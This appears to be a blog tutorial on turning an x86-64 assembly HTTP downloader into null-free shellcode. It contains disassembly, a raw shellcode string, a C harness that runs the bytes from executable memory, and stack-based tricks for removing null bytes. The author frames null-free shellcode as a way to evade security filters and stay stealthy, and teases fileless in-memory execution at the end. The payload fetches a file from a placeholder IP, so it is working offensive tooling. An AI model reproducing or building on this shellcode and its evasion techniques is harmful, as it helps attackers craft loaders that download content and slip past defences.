Crafting a 232-Bytes HTTP Shellcode

To continue, we might consider using assembly code to further our goals. We may think about things like inline assembly in the C code. No! what about shellcodes? I think it’s very amazing to convert our assembly code to shellcode. But everything will not be so simple and, especially for more complex code, we may modify the assembly code so the shellcode can perform correctly.

-> but not <-

have you tried to elicit shellcode from assembly code? Or rather, have you tried to convert assembly code to shellcode? It’s not just copying the byte codes of the object code from something like, objdump! If you do this you will see that your shellcode may not act properly. Virtually, we can conclude assembly from shellcode but the other way around. Honestly, we can conclude shellcode from assembly but it may not work as expected without any modification. For example, let’s convert the previously written assembly code to shellcode and execute that. First, let’s disassemble that with objdump. The result is something like this(for some IP address other than 1.2.3.4):

# objdump -d dl.o

dl.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:   48 c7 c0 29 00 00 00    mov    $0x29,%rax
   7:   48 c7 c7 02 00 00 00    mov    $0x2,%rdi
   e:   48 c7 c6 01 00 00 00    mov    $0x1,%rsi
  15:   48 c7 c2 06 00 00 00    mov    $0x6,%rdx
  1c:   0f 05                   syscall 
  1e:   48 85 c0                test   %rax,%rax
  21:   78 71                   js     94 <_exit>
  23:   48 89 c7                mov    %rax,%rdi
  26:   48 c7 c0 2a 00 00 00    mov    $0x2a,%rax
  2d:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 34 <_start+0x34>
  34:   48 c7 c2 10 00 00 00    mov    $0x10,%rdx
  3b:   0f 05                   syscall 
  3d:   48 85 c0                test   %rax,%rax
  40:   78 52                   js     94 <_exit>
  42:   48 c7 c0 2c 00 00 00    mov    $0x2c,%rax
  49:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 50 <_start+0x50>
  50:   48 c7 c2 00 10 00 00    mov    $0x1000,%rdx
  57:   0f 05                   syscall 
  59:   48 85 c0                test   %rax,%rax
  5c:   78 36                   js     94 <_exit>
  5e:   48 c7 c0 2d 00 00 00    mov    $0x2d,%rax
  65:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 6c <_start+0x6c>
  6c:   48 c7 c2 00 10 00 00    mov    $0x1000,%rdx
  73:   0f 05                   syscall 
  75:   48 85 c0                test   %rax,%rax
  78:   7e 1a                   jle    94 <_exit>
  7a:   48 89 c2                mov    %rax,%rdx
  7d:   48 c7 c0 01 00 00 00    mov    $0x1,%rax
  84:   48 c7 c7 01 00 00 00    mov    $0x1,%rdi
  8b:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 92 <_start+0x92>
  92:   0f 05                   syscall 

0000000000000094 <_exit>:
  94:   48 c7 c0 3c 00 00 00    mov    $0x3c,%rax
  9b:   48 31 ff                xor    %rdi,%rdi
  9e:   0f 05                   syscall
Bash

And, we can use byte codes to generate our shellcode:

# objdump -d dl.o | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'

\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05
Bash

Now, let’s execute the shellcode to see if it works correctly. We can test that with a simple C program:

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int main(int argc, char **argv) {
    unsigned char code[]=
    "\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02"
    "\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48"
    "\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0"
    "\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00"
    "\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48"
    "\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0"
    "\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48"
    "\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00"
    "\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94"
    "\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00"
    "\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00"
    "\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2"
    "\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01"
    "\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92"
    "\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31"
    "\xff\x0f\x05";
    void *exec_mem = mmap(NULL, sizeof(code), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | 
    MAP_PRIVATE, -1, 0);
    if (exec_mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    memcpy(exec_mem, code, sizeof(code));

    ((void(*)())exec_mem)();

    return 0;
}
C

Compile it statically and even bypass stack protections:

# gcc --static -fno-stack-protector -z execstack test_shell.c -o test_shell
Bash

If we execute the compiled program, we see that it does not work as expected(It may stop with segmentation fault, wrong syscalls, etc):

# ./test_shell
Segmentation fault (core dumped)

#strace ./test_shell
execve("./test_shell", ["./test_shell"], 0x7ffc1ac95500 /* 19 vars */) = 0
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffc8d4c7890) = -1 EINVAL (Invalid argument)
brk(NULL)                               = 0x1a2a000
brk(0x1a2adc0)                          = 0x1a2adc0
arch_prctl(ARCH_SET_FS, 0x1a2a3c0)      = 0
set_tid_address(0x1a2a690)              = 1338816
set_robust_list(0x1a2a6a0, 24)          = 0
rseq(0x1a2ad60, 0x20, 0, 0x53053053)    = 0
uname({sysname="Linux", nodename="XXXXXXXX", ...}) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
readlink("/proc/self/exe", "/home/XXX/XXXXX/shell/test_shell", 4096) = 25
getrandom("\xb4\xab\xfc\x2d\x89\x59\x51\x89", 8, GRND_NONBLOCK) = 8
brk(0x1a4bdc0)                          = 0x1a4bdc0
brk(0x1a4c000)                          = 0x1a4c000
mprotect(0x4c1000, 16384, PROT_READ)    = 0
mmap(NULL, 169, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f740107d000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
getrusage(0x8d4c7638 /* RUSAGE_??? */, 0x7f740107d035) = -1 EINVAL (Invalid argument)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xffffffffffffffea} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
Bash

So, what could be wrong with that?!

Null Bytes

Again, if we look at the shellcode charily, we will see some bytes like 0x00. These bytes are known as null bytes. A null byte, represented as \0 in programming, is a character with an ASCII value of zero. It is often used to signify the end of a string in languages like C and C++. This special character plays a crucial role in string manipulation and memory management, marking the termination point of a string so that functions know where the string ends. The presence of null bytes in shellcodes can cause significant issues:

  • Premature Termination: Many functions that handle strings, such as strcpy in C, treat the null byte as the end of the string.If a shellcode contains null bytes, these functions may terminate the copy operation prematurely, leading to incomplete execution of the shellcode.
  • Execution Failures: Shellcodes are often injected into memory spaces where they need to be executed without interruption.Null bytes can disrupt this process, causing the shellcode to fail or behave unpredictably.
  • Detection and Prevention: Security mechanisms may detect null bytes as anomalies, flagging the shellcode as malicious.This can lead to the shellcode being blocked or removed before it can execute.

Preventing null bytes in shellcodes is essential for several reasons:

  • Ensuring Complete Execution: By avoiding null bytes, we ensure that the entire shellcode is copied and executed as intended.This is crucial for the success of the exploit.
  • Bypassing Security Filters: Many security systems and filters are designed to detect and block shellcodes containing null bytes. Crafting shellcodes without null bytes helps in evading these defenses.
  • Maintaining Stealth: Null-free shellcodes are less likely to be detected by security mechanisms, allowing the exploit to proceed without raising alarms.

For example, null bytes in our shellcode cause a segmentation fault. It can has various reasons including:

  • String Termination: As I said before, In C, null bytes (\0) are used to terminate strings. If the shellcode is treated as a string, the presence of null bytes can cause it to be truncated, leading to incomplete execution and potential segmentation faults.
  • Memory Misalignment: Null bytes can cause memory misalignment issues. If the shellcode is not properly aligned in memory, it can lead to invalid memory access, resulting in segmentation faults.
  • Null Pointer Dereferencing: If the shellcode inadvertently sets a pointer to NULL and then tries to dereference it, this will cause a segmentation fault because the program is trying to access an invalid memory location.
  • System Call Arguments: Null bytes in the shellcode might affect the arguments passed to system calls. If a system call receives an unexpected null byte, it might interpret the arguments incorrectly, leading to invalid operations and segmentation faults.

So it seems that the presence of null bytes makes our shellcode not work properly and we cannot use it to advance our goals(even though the assembly code works properly). So, let’s go see if we can make our shellcode null-free or not.

Null-free shellcode

I am determined to make the shellcode null-free, and I should say, I’m not bored explaining everything, and in my opinion, everyone who reads this can understand it completely(Otherwise here is the wrong place for him/her 😀 ).

Good! you have read this and checked the code carefully. As you know, there is some stuff in the .data section that was used in the .text section of the code(like sockaddr structure). For example, take a look at the following code:

lea sockaddr(%rip), %rsi

Whose corresponding in the disassembled code is equal to:

lea 0x0(%rip),%rsi

As you know, the instruction computes the address of the sockaddr structure, which is defined in the .data section, relative to the current instruction pointer, and then stores this address in the %rsi register. So, what is 0x0(%rip)? It means its address is exactly same as the current value of rip. just hooey 😀 and it totally normal. Obviously, the assembler cannot resolve the sockaddr address. So, the technique I will use for this challenge is removing the .data section and bringing everything into the .text section by using the stack in the whole technique.
The sockaddr structure represents an IPv4 socket address which includes address family(.word 2 or AF_INET for IPv4), port number(.word 0x5000), IP address(.byte 1, 2, 3, 4 in out example) and padding to make the structure 16 bytes.
As I said above, we need 16 bytes to store the sockaddr structure. So if we want to use the stack to do the job, we need to allocate 16 bytes on the stack:

sub $16, %rsp

Now, we should set the address family(2). There are two ways for doing this:

push $2
pop %ax
mov $ax, (%rsp)

And:

mov $0x2, %ax
mov %ax, (%rsp)

I choose one, because the second may create a null byte. You can test it 😀
The last instruction moves the value in ax(which is 2) to the memory location pointed to by rsp(the top of the stack).

For port number:

mov $0x1001, %ax
shl $2, %ax
add $0x0ffc, %ax
mov %ax, 2(%rsp)

Or simply:

mov $0x5000, %ax
mov %ax, 2(%rsp)

But I certainly choose the first one, and you know why 😀

For IP address:

mov $0x0201, %ax #little endian
mov %ax, 4(%rsp)
mov $0x0304, %ax #little endian
mov %ax, 6(%rsp)

The second instruction moves this value into the memory location 4 bytes from the top of the stack and the same for the forth.
Or we can change to:

mov $0x04030201, %eax

And let’s zero out remaining bytes:

xor %eax, %eax
mov %ax, 8(%rsp)
mov %ax, 10(%rsp)
mov %ax, 12(%rsp)
mov %ax, 14(%rsp)

That’s it for the sockaddr 🙂 and the same approach for the number of bytes for the connect syscall:

xor %eax, %eax
mov $42, %al
mov %rsp, %rsi
push $16
pop %rdx
syscall

We have another .data section that includes url, the path of the remote file, the http request, and the IP address. Ignore everything but http_request. We should give it the same hell we gave to sockaddr.
Consider “”GET /f HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: close\r\n\r\n”” request line and headers(for simplicity I have removed some headers and changed the /file.txt to /f). We can build the request easily on the stack:

sub $64, %rsp

# "GET /f HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: close\r\n\r\n"
mov $0x0a0d0a0d65736c6f, %rax  # "se\r\n\r\n"
mov %rax, 48(%rsp)
mov $0x632020203a6e6f69, %rax  # "ion:   clo: "
mov %rax, 40(%rsp)
mov $0x7463656e6e6f430d, %rax  # "\nConnect"
mov %rax, 32(%rsp)
mov $0x0a312e322e332e34, %rax  # "1.2.3.4\r"
mov %rax, 24(%rsp)
mov $0x203a74736f480a0d, %rax  # "\r\nHost: "
mov %rax, 16(%rsp)
mov $0x312e312f50545448, %rax  # "HTTP/1.1"
mov %rax, 8(%rsp)
mov $0x2020662f20544547, %rax  # "GET /f  "
mov %rax, 0(%rsp)

Now, continue to use that in our sendto syscall:

xor %eax, %eax
mov $44, %al
mov %rsp, %rsi
push $64
pop %rdx
xor %r10,%r10
xor %r8,%r8
xor %r9,%r9
syscall

add $64, %rsp  # Clean up the stack

Here, we used the data pushed on the stack for the second argument(%rsi) of sendto syscall. The length of the buffer is 64 as the third argument(%rdx). The rest of the arguments are 0, NULL and 0 are done by xor. Note that we must set these arguments, otherwise, for some assemblers, setting the syscall arguments may be problematic.

Finally, for the recvfrom syscall:

xor %eax, %eax
mov $45, %al
mov %rsp, %rsi
xor %rdx, %rdx
mov $0x101, %rdx
shl $4, %rdx 
shl $2, %rdx 
sub $0x40, %rdx 
xor %r10,%r10
syscall

The buffer is on the stack as the second argument(%rsi) pointed by %rsp. The third argument is the buffer size which I set this to 16384.

Now, the party is over 😀 and if you check the null bytes in the shellcode you may see one, just for 0x101 that is not important(of course you can remove it by some mathematical operations to set the third argument of recvfrom syscall, but it’s up to you 😀 )

The code was pushed here(but for some another IP address not 1.2.3.4)

And then…?

Don’t say so much, then what, then what… But, What do you think if we can enter and execute this shellcode directly into the memory, without the intervention of the disk? 😀

Leave a Reply

Your email address will not be published. Required fields are marked *

2 + 10 =